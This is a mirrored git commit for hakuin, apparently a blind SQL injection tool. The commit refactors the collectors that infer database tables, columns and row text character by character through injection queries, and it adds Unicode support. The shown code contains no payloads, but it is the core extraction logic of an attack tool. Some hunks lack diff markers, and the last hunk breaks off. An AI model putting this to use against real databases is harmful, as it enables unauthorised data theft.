mirror of
https://github.com/pruzko/hakuin
synced 2024-10-18 07:38:08 +02:00
major refactoring (DBMS, collectors) & unicode support
This commit is contained in:
parent
042fa5df91
commit
9932d8dacd
3
.gitignore
vendored
3
.gitignore
vendored
@ -162,4 +162,5 @@ cython_debug/
|
||||
#.idea/
|
||||
|
||||
# Hakuin
|
||||
tmp/
|
||||
tmp/
|
||||
demos/
|
||||
|
@ -1,7 +1,6 @@
|
||||
import hakuin
|
||||
import hakuin.search_algorithms as search_alg
|
||||
import hakuin.collectors as collect
|
||||
from hakuin.utils import CHARSET_SCHEMA
|
||||
|
||||
|
||||
|
||||
@ -33,24 +32,23 @@ class Extractor:
|
||||
|
||||
ctx = search_alg.Context(None, None, None, None)
|
||||
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_tables,
|
||||
upper=8
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.TablesQueries.rows_count,
|
||||
upper=8,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_tables,
|
||||
charset=CHARSET_SCHEMA,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.TablesQueries,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.ModelTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_tables,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.TablesQueries,
|
||||
model=hakuin.get_model_tables(),
|
||||
charset=CHARSET_SCHEMA,
|
||||
).run(ctx, n_rows)
|
||||
|
||||
|
||||
@ -70,24 +68,23 @@ class Extractor:
|
||||
|
||||
ctx = search_alg.Context(table, None, None, None)
|
||||
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_columns,
|
||||
upper=8
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.ColumnsQueries.rows_count,
|
||||
upper=8,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_columns,
|
||||
charset=CHARSET_SCHEMA,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.ColumnsQueries,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.ModelTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_columns,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.ColumnsQueries,
|
||||
model=hakuin.get_model_columns(),
|
||||
charset=CHARSET_SCHEMA,
|
||||
).run(ctx, n_rows)
|
||||
|
||||
|
||||
@ -104,15 +101,15 @@ class Extractor:
|
||||
ctx = search_alg.Context(table, column, None, None)
|
||||
|
||||
d_type = search_alg.BinarySearch(
|
||||
self.requester,
|
||||
self.dbms.meta_type,
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.MetaQueries.column_data_type,
|
||||
values=self.dbms.DATA_TYPES,
|
||||
).run(ctx)
|
||||
|
||||
return {
|
||||
'type': d_type,
|
||||
'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)),
|
||||
'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)),
|
||||
'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
|
||||
'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
|
||||
}
|
||||
|
||||
|
||||
@ -140,7 +137,7 @@ class Extractor:
|
||||
return schema
|
||||
|
||||
|
||||
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
|
||||
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
|
||||
'''Extracts text column.
|
||||
|
||||
Params:
|
||||
@ -152,7 +149,6 @@ class Extractor:
|
||||
'dynamic' for dynamically choosing the best search strategy and
|
||||
opportunistically guessing strings
|
||||
charset (list|None): list of possible characters
|
||||
n_rows (int|None): number of rows
|
||||
n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set
|
||||
|
||||
Returns:
|
||||
@ -162,32 +158,30 @@ class Extractor:
|
||||
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
|
||||
|
||||
ctx = search_alg.Context(table, column, None, None)
|
||||
|
||||
if n_rows is None:
|
||||
n_rows = search_alg.IntExponentialSearch(
|
||||
self.requester,
|
||||
self.dbms.count_rows,
|
||||
upper=n_rows_guess
|
||||
).run(ctx)
|
||||
n_rows = search_alg.IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.dbms.RowsQueries.rows_count,
|
||||
upper=n_rows_guess,
|
||||
find_range=True,
|
||||
).run(ctx)
|
||||
|
||||
if strategy == 'binary':
|
||||
return collect.BinaryTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
elif strategy in ['unigram', 'fivegram']:
|
||||
ngram = 1 if strategy == 'unigram' else 5
|
||||
return collect.AdaptiveTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
model=hakuin.Model(ngram),
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
else:
|
||||
return collect.DynamicTextCollector(
|
||||
self.requester,
|
||||
self.dbms.char_rows,
|
||||
self.dbms.string_rows,
|
||||
requester=self.requester,
|
||||
queries=self.dbms.RowsQueries,
|
||||
charset=charset,
|
||||
).run(ctx, n_rows)
|
||||
|
@ -26,8 +26,9 @@ class Model:
|
||||
|
||||
@property
|
||||
def order(self):
|
||||
assert self.model
|
||||
return self.model.order
|
||||
if self.model:
|
||||
return self.model.order
|
||||
return None
|
||||
|
||||
|
||||
def load(self, file):
|
||||
@ -49,7 +50,7 @@ class Model:
|
||||
Returns:
|
||||
dict: likelihood distribution
|
||||
'''
|
||||
context = context[-(self.order - 1):]
|
||||
context = [] if self.order == 1 else context[-(self.order - 1):]
|
||||
|
||||
while context:
|
||||
scores = self._scores(context)
|
||||
|
@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
|
||||
from collections import Counter
|
||||
|
||||
import hakuin
|
||||
from hakuin.utils import tokenize, CHARSET_ASCII, EOS
|
||||
from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
|
||||
from hakuin.utils.huffman import make_tree
|
||||
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
|
||||
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
|
||||
|
||||
|
||||
|
||||
class Collector(metaclass=ABCMeta):
|
||||
'''Abstract class for collectors. Collectors repeatedly run
|
||||
search algorithms to infer column rows.
|
||||
search algorithms to extract column rows.
|
||||
'''
|
||||
def __init__(self, requester, query_cb):
|
||||
def __init__(self, requester, queries):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
queries (UniformQueries): injection queries
|
||||
'''
|
||||
self.requester = requester
|
||||
self.query_cb = query_cb
|
||||
self.queries = queries
|
||||
|
||||
|
||||
def run(self, ctx, n_rows):
|
||||
'''Run collection.
|
||||
def run(self, ctx, n_rows, *args, **kwargs):
|
||||
'''Collects the whole column.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
ctx (Context): extraction context
|
||||
n_rows (int): number of rows in column
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
logging.info(f'Inferring "{ctx.table}.{ctx.column}"...')
|
||||
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
|
||||
|
||||
data = []
|
||||
for row in range(n_rows):
|
||||
ctx = Context(ctx.table, ctx.column, row, None)
|
||||
res = self._collect_row(ctx)
|
||||
res = self.collect_row(ctx, *args, **kwargs)
|
||||
data.append(res)
|
||||
|
||||
logging.info(f'({row + 1}/{n_rows}) inferred: {res}')
|
||||
logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
|
||||
|
||||
return data
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def _collect_row(self, ctx):
|
||||
def collect_row(self, ctx, *args, **kwargs):
|
||||
'''Collects a row.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
value: single row
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
|
||||
|
||||
class TextCollector(Collector):
|
||||
'''Collector for text columns.'''
|
||||
def _collect_row(self, ctx):
|
||||
def __init__(self, requester, queries, charset=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
queries (UniformQueries): injection queries
|
||||
charset (list|None): list of possible characters, None for default ASCII
|
||||
'''
|
||||
super().__init__(requester, queries)
|
||||
self.charset = charset if charset is not None else CHARSET_ASCII
|
||||
if EOS not in self.charset:
|
||||
self.charset.append(EOS)
|
||||
|
||||
|
||||
def run(self, ctx, n_rows):
|
||||
'''Collects the whole column.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
n_rows (int): number of rows in column
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
rows_are_ascii = self.check_rows_are_ascii(ctx)
|
||||
return super().run(ctx, n_rows, rows_are_ascii)
|
||||
|
||||
|
||||
def collect_row(self, ctx, rows_are_ascii):
|
||||
'''Collects a row.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
rows_are_ascii (bool): ASCII flag for all rows in column
|
||||
|
||||
Returns:
|
||||
string: single row
|
||||
'''
|
||||
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
|
||||
|
||||
ctx.s = ''
|
||||
while True:
|
||||
c = self._collect_char(ctx)
|
||||
c = self.collect_char(ctx, row_is_ascii)
|
||||
if c == EOS:
|
||||
return ctx.s
|
||||
ctx.s += c
|
||||
|
||||
|
||||
@abstractmethod
|
||||
def _collect_char(self, ctx):
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
string: single character
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
|
||||
def check_rows_are_ascii(self, ctx):
|
||||
'''Finds out whether all rows in column are ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.rows_are_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
def check_row_is_ascii(self, ctx):
|
||||
'''Finds out whether current row is ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.row_is_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
def check_char_is_ascii(self, ctx):
|
||||
'''Finds out whether current character is ASCII.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
|
||||
Returns:
|
||||
bool: ASCII flag
|
||||
'''
|
||||
query = self.queries.char_is_ascii(ctx)
|
||||
return self.requester.request(ctx, query)
|
||||
|
||||
|
||||
|
||||
class BinaryTextCollector(TextCollector):
|
||||
'''Binary search text collector'''
|
||||
def __init__(self, requester, query_cb, charset=None):
|
||||
'''Constructor.
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
charset (list|None): list of possible characters
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
string: single character
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
values=self.charset,
|
||||
).run(ctx)
|
||||
def emulate_char(self, ctx, row_is_ascii, correct):
|
||||
'''Emulates character collection without sending requests.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
correct (str): correct character
|
||||
|
||||
Returns:
|
||||
int: number of requests necessary
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
|
||||
|
||||
|
||||
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
|
||||
total_queries = 0
|
||||
|
||||
# custom charset or ASCII
|
||||
if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
|
||||
search_alg = BinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char,
|
||||
values=self.charset,
|
||||
correct=correct,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
total_queries += search_alg.n_queries
|
||||
|
||||
if res is not None:
|
||||
return res, total_queries
|
||||
|
||||
# Unicode
|
||||
correct_ord = ord(correct) if correct is not None else correct
|
||||
search_alg = IntExponentialBinarySearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char_unicode,
|
||||
lower=ASCII_MAX + 1,
|
||||
upper=UNICODE_MAX + 1,
|
||||
find_range=False,
|
||||
correct=correct_ord,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
total_queries += search_alg.n_queries
|
||||
|
||||
return chr(res), total_queries
|
||||
|
||||
|
||||
def _check_or_emulate_char_is_ascii(self, ctx, correct):
|
||||
if correct is None:
|
||||
return self.check_char_is_ascii(ctx)
|
||||
return correct.isascii()
|
||||
|
||||
|
||||
|
||||
class ModelTextCollector(TextCollector):
|
||||
'''Language model-based text collector.'''
|
||||
def __init__(self, requester, query_cb, model, charset=None):
|
||||
def __init__(self, requester, queries, model, charset=None):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_cb (function): query construction function
|
||||
queries (UniformQueries): injection queries
|
||||
model (Model): language model
|
||||
charset (list|None): list of possible characters
|
||||
|
||||
Returns:
|
||||
list: column rows
|
||||
'''
|
||||
super().__init__(requester, query_cb)
|
||||
super().__init__(requester, queries, charset)
|
||||
self.model = model
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
self.binary_collector = BinaryTextCollector(
|
||||
requester=self.requester,
|
||||
queries=self.queries,
|
||||
charset=self.charset,
|
||||
)
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
def collect_char(self, ctx, row_is_ascii):
|
||||
'''Collects a character.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
|
||||
Returns:
|
||||
string: single character
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
|
||||
|
||||
|
||||
def emulate_char(self, ctx, row_is_ascii, correct):
|
||||
'''Emulates character collection without sending requests.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
row_is_ascii (bool): row ASCII flag
|
||||
correct (str): correct character
|
||||
|
||||
Returns:
|
||||
int: number of requests necessary
|
||||
'''
|
||||
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
|
||||
|
||||
|
||||
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
|
||||
n_queries_model = 0
|
||||
|
||||
model_ctx = tokenize(ctx.s, add_eos=False)
|
||||
scores = self.model.scores(context=model_ctx)
|
||||
|
||||
c = TreeSearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
search_alg = TreeSearch(
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.char,
|
||||
tree=make_tree(scores),
|
||||
).run(ctx)
|
||||
correct=correct,
|
||||
)
|
||||
res = search_alg.run(ctx)
|
||||
n_queries_model = search_alg.n_queries
|
||||
|
||||
if c is not None:
|
||||
return c
|
||||
if res is not None:
|
||||
return res, n_queries_model
|
||||
|
||||
charset = list(set(self.charset).difference(set(scores)))
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_cb,
|
||||
values=self.charset,
|
||||
).run(ctx)
|
||||
res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
|
||||
return res, n_queries_model + n_queries_binary
|
||||
|
||||
|
||||
|
||||
class AdaptiveTextCollector(ModelTextCollector):
    '''Same as ModelTextCollector but adapts the model.'''
    def collect_char(self, ctx, row_is_ascii):
        '''Collects a character and fits the model with it.

        Params:
            ctx (Context): extraction context
            row_is_ascii (bool): row ASCII flag

        Returns:
            string: single character
        '''
        # The signature must match TextCollector.collect_row, which calls
        # collect_char(ctx, row_is_ascii); the flag is forwarded unchanged.
        c = super().collect_char(ctx, row_is_ascii)
        # ctx.s still holds the prefix collected so far (the caller appends
        # "c" only after this method returns).
        self.model.fit_correct_char(c, partial_str=ctx.s)
        return c
|
||||
|
||||
|
||||
|
||||
class DynamicTextStats:
    '''Helper class of DynamicTextCollector to keep track of statistical information.

    Two things are tracked: the running mean length of the collected strings
    and, for every strategy, the mean number of requests per character (RPC)
    over a sliding window of the most recent samples.
    '''
    STRATEGIES = ('binary', 'unigram', 'fivegram')


    def __init__(self, hist_size=100):
        '''Constructor.

        Params:
            hist_size (int): number of most recent RPC samples kept per strategy

        Raises:
            ValueError: if hist_size is smaller than 1
        '''
        # A window of 0 would turn the "[-hist_size:]" slice into "[-0:]",
        # which keeps the whole history instead of nothing.
        if hist_size < 1:
            raise ValueError(f'hist_size must be at least 1, got {hist_size}')

        self.hist_size = hist_size
        self.str_len_mean = 0.0
        self.n_strings = 0
        self._rpc = {
            strategy: {'mean': 0.0, 'hist': []}
            for strategy in self.STRATEGIES
        }


    def update_str(self, s):
        '''Updates the running mean of string lengths with a new string.

        Params:
            s (str): newly collected string
        '''
        self.n_strings += 1
        self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings


    def update_rpc(self, strategy, n_queries):
        '''Records the number of requests a strategy needed for one character.

        Params:
            strategy (str): strategy name ('binary', 'unigram', or 'fivegram')
            n_queries (int): number of requests necessary
        '''
        rpc = self._rpc[strategy]
        rpc['hist'].append(n_queries)
        # Keep only the most recent samples so the mean follows recent data.
        rpc['hist'] = rpc['hist'][-self.hist_size:]
        rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])


    def rpc(self, strategy):
        '''Returns the mean RPC of a strategy.

        Params:
            strategy (str): strategy name ('binary', 'unigram', or 'fivegram')

        Returns:
            float: mean RPC over the sliding window, 0.0 if nothing was recorded
        '''
        return self._rpc[strategy]['mean']


    def best_strategy(self):
        '''Returns the strategy with the lowest mean RPC.

        Returns:
            str: strategy name; ties resolve to the first one in STRATEGIES order
        '''
        return min(self._rpc, key=self.rpc)
|
||||
|
||||
|
||||
|
||||
class DynamicTextCollector(TextCollector):
    '''Dynamic text collector. The collector keeps statistical information (RPC)
    for several strategies (binary search, unigram, and five-gram) and dynamically
    chooses the best one. In addition, it uses the statistical information to
    identify when guessing whole strings is likely to succeed and then uses
    previously inferred strings to make the guesses.
    '''
    def __init__(self, requester, queries, charset=None):
        '''Constructor.

        Params:
            requester (Requester): Requester instance
            queries (UniformQueries): injection queries
            charset (list|None): list of possible characters

        Other Attributes:
            binary_collector (BinaryTextCollector): binary search collector
            unigram_collector (ModelTextCollector): collector with an adaptive unigram model
            fivegram_collector (ModelTextCollector): collector with an adaptive five-gram model
            guess_collector (StringGuessingCollector): collector for guessing
            stats (DynamicTextStats): statistical information
        '''
        super().__init__(requester, queries, charset)
        self.binary_collector = BinaryTextCollector(
            requester=self.requester,
            queries=self.queries,
            charset=self.charset,
        )
        self.unigram_collector = ModelTextCollector(
            requester=self.requester,
            queries=self.queries,
            model=hakuin.Model(1),
            charset=self.charset,
        )
        self.fivegram_collector = ModelTextCollector(
            requester=self.requester,
            queries=self.queries,
            model=hakuin.Model(5),
            charset=self.charset,
        )
        self.guess_collector = StringGuessingCollector(
            requester=self.requester,
            queries=self.queries,
        )
        self.stats = DynamicTextStats()


    def collect_row(self, ctx, rows_are_ascii):
        '''Collects a row and updates the guessing model and string statistics.

        Params:
            ctx (Context): extraction context
            rows_are_ascii (bool): ASCII flag for all rows in column

        Returns:
            string: single row
        '''
        # The per-row ASCII check is only requested when the column-wide flag is not set.
        row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)

        s = self._collect_string(ctx, row_is_ascii)
        self.guess_collector.model.fit_single(s, context=[])
        self.stats.update_str(s)

        return s


    def _collect_string(self, ctx, row_is_ascii):
        '''Tries to guess strings or extracts them on per-character basis if guessing fails'''
        # Expected cost of per-character extraction: mean string length times
        # the mean RPC of the currently best strategy. It is handed to the
        # guess collector as the cost of the alternative extraction method.
        exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
        correct_str = self.guess_collector.collect_row(ctx, exp_c)

        if correct_str is not None:
            self._update_stats_str(ctx, row_is_ascii, correct_str)
            self.unigram_collector.model.fit_data([correct_str])
            self.fivegram_collector.model.fit_data([correct_str])
            return correct_str

        return self._collect_string_per_char(ctx, row_is_ascii)


    def _collect_string_per_char(self, ctx, row_is_ascii):
        '''Extracts a string character by character until EOS is collected.

        Params:
            ctx (Context): extraction context
            row_is_ascii (bool): row ASCII flag

        Returns:
            string: single row
        '''
        ctx.s = ''
        while True:
            c = self.collect_char(ctx, row_is_ascii)
            # Statistics are emulated before the models are fitted with "c".
            self._update_stats(ctx, row_is_ascii, c)
            self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
            self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)

            if c == EOS:
                return ctx.s
            ctx.s += c


    def collect_char(self, ctx, row_is_ascii):
        '''Chooses the best strategy and uses it to infer a character.'''
        best = self.stats.best_strategy()
        if best == 'binary':
            return self.binary_collector.collect_char(ctx, row_is_ascii)
        elif best == 'unigram':
            return self.unigram_collector.collect_char(ctx, row_is_ascii)
        else:
            return self.fivegram_collector.collect_char(ctx, row_is_ascii)


    def _update_stats(self, ctx, row_is_ascii, correct):
        '''Emulates all strategies without sending requests and updates the statistical information.'''
        collectors = (
            ('binary', self.binary_collector),
            ('unigram', self.unigram_collector),
            ('fivegram', self.fivegram_collector),
        )

        for strategy, collector in collectors:
            n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
            self.stats.update_rpc(strategy, n_queries)


    def _update_stats_str(self, ctx, row_is_ascii, correct_str):
        '''Like _update_stats but for whole strings.'''
        ctx.s = ''
        for c in correct_str:
            self._update_stats(ctx, row_is_ascii, c)
            ctx.s += c
|
||||
|
||||
|
||||
|
||||
class StringGuessingCollector(Collector):
|
||||
'''String guessing collector. The collector keeps track of previously extracted
|
||||
strings and opportunistically tries to guess new strings.
|
||||
'''
|
||||
GUESS_TH = 0.5
|
||||
GUESS_SCORE_TH = 0.01
|
||||
|
||||
|
||||
def __init__(self, requester, query_char_cb, query_string_cb, charset=None):
|
||||
def __init__(self, requester, queries):
|
||||
'''Constructor.
|
||||
|
||||
Params:
|
||||
requester (Requester): Requester instance
|
||||
query_char_cb (function): query construction function for searching characters
|
||||
query_string_cb (function): query construction function for searching strings
|
||||
charset (list|None): list of possible characters
|
||||
queries (UniformQueries): injection queries
|
||||
|
||||
Other Attributes:
|
||||
model_guess: adaptive string-based model for guessing
|
||||
model_unigram: adaptive unigram model
|
||||
model_fivegram: adaptive five-gram model
|
||||
GUESS_TH (float): minimal threshold necessary to start guessing
|
||||
GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
|
||||
model (Model): adaptive string-based model for guessing
|
||||
'''
|
||||
self.requester = requester
|
||||
self.query_char_cb = query_char_cb
|
||||
self.query_string_cb = query_string_cb
|
||||
self.charset = charset if charset else CHARSET_ASCII
|
||||
self.model_guess = hakuin.Model(1)
|
||||
self.model_unigram = hakuin.Model(1)
|
||||
self.model_fivegram = hakuin.Model(5)
|
||||
self._stats = {
|
||||
'rpc': {
|
||||
'binary': {'avg': 0.0, 'hist': []},
|
||||
'unigram': {'avg': 0.0, 'hist': []},
|
||||
'fivegram': {'avg': 0.0, 'hist': []},
|
||||
},
|
||||
'avg_len': 0.0,
|
||||
'n_strings': 0,
|
||||
}
|
||||
super().__init__(requester, queries)
|
||||
self.model = hakuin.Model(1)
|
||||
|
||||
|
||||
def _collect_row(self, ctx):
|
||||
s = self._collect_string(ctx)
|
||||
self.model_guess.fit_single(s, context=[])
|
||||
def collect_row(self, ctx, exp_alt=None):
|
||||
'''Tries to construct a guessing Huffman tree and searches it in case of success.
|
||||
|
||||
self._stats['n_strings'] += 1
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
|
||||
|
||||
total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s)
|
||||
self._stats['avg_len'] = total / self._stats['n_strings']
|
||||
return s
|
||||
|
||||
|
||||
def _collect_string(self, ctx):
|
||||
'''Identifies if guessings strings is likely to succeed and if yes, it makes guesses.
|
||||
If guessing does not take place or fails, it proceeds with per-character inference.
|
||||
Returns:
|
||||
string|None: guessed string or None if skipped or failed
|
||||
'''
|
||||
correct_str = self._try_guessing(ctx)
|
||||
|
||||
if correct_str is not None:
|
||||
self._update_stats_str(ctx, correct_str)
|
||||
self.model_unigram.fit_data([correct_str])
|
||||
self.model_fivegram.fit_data([correct_str])
|
||||
return correct_str
|
||||
|
||||
ctx.s = ''
|
||||
while True:
|
||||
c = self._collect_char(ctx)
|
||||
|
||||
self._update_stats(ctx, c)
|
||||
self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
|
||||
self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
|
||||
|
||||
if c == EOS:
|
||||
return ctx.s
|
||||
|
||||
ctx.s += c
|
||||
|
||||
|
||||
def _collect_char(self, ctx):
|
||||
'''Chooses the best strategy and uses it to infer a character.'''
|
||||
searched_space = set()
|
||||
c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
|
||||
if c is None:
|
||||
c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
|
||||
return c
|
||||
|
||||
|
||||
def _try_guessing(self, ctx):
|
||||
'''Tries to construct a guessing Huffman tree and searches it in case of success.'''
|
||||
tree = self._get_guess_tree(ctx)
|
||||
exp_alt = exp_alt if exp_alt is not None else float('inf')
|
||||
tree = self._get_guess_tree(ctx, exp_alt)
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_string_cb,
|
||||
requester=self.requester,
|
||||
query_cb=self.queries.string,
|
||||
tree=tree,
|
||||
).run(ctx)
|
||||
|
||||
|
||||
def _get_guess_tree(self, ctx):
|
||||
def _get_guess_tree(self, ctx, exp_alt):
|
||||
'''Identifies, whether string guessing is likely to succeed and if so,
|
||||
it constructs a Huffman tree from previously inferred strings.
|
||||
|
||||
Params:
|
||||
ctx (Context): extraction context
|
||||
exp_alt (float): expectation for alternative extraction method
|
||||
|
||||
Returns:
|
||||
utils.huffman.Node|None: Huffman tree constructed from previously inferred
|
||||
strings that are likely to succeed or None if no such strings were found
|
||||
utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
|
||||
likely to succeed or None if no such strings were found
|
||||
'''
|
||||
|
||||
# Expectation for per-character inference:
|
||||
# exp_c = avg_len * best_strategy_rpc
|
||||
exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
|
||||
|
||||
# Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
|
||||
# strings into a candidate guess set "guesses" and computing their expectation "exp_g".
|
||||
# The iteration stops when the minimal "exp_g" is found.
|
||||
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c)
|
||||
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_alt)
|
||||
guesses = {}
|
||||
prob_g = 0.0
|
||||
best_prob_g = 0.0
|
||||
best_exp_g = float('inf')
|
||||
best_tree = None
|
||||
|
||||
scores = self.model_guess.scores(context=[])
|
||||
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
|
||||
scores = self.model.scores(context=[])
|
||||
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
|
||||
for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
|
||||
guesses[guess] = score
|
||||
|
||||
tree = make_tree(guesses)
|
||||
tree_cost = tree.search_cost()
|
||||
prob_g += score
|
||||
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
|
||||
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
|
||||
|
||||
if exp_g > best_exp_g:
|
||||
break
|
||||
@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
|
||||
best_exp_g = exp_g
|
||||
best_tree = tree
|
||||
|
||||
if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
|
||||
return None
|
||||
if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
|
||||
return best_tree
|
||||
|
||||
return best_tree
|
||||
|
||||
|
||||
def _best_strategy(self):
|
||||
'''Returns the name of the best strategy.'''
|
||||
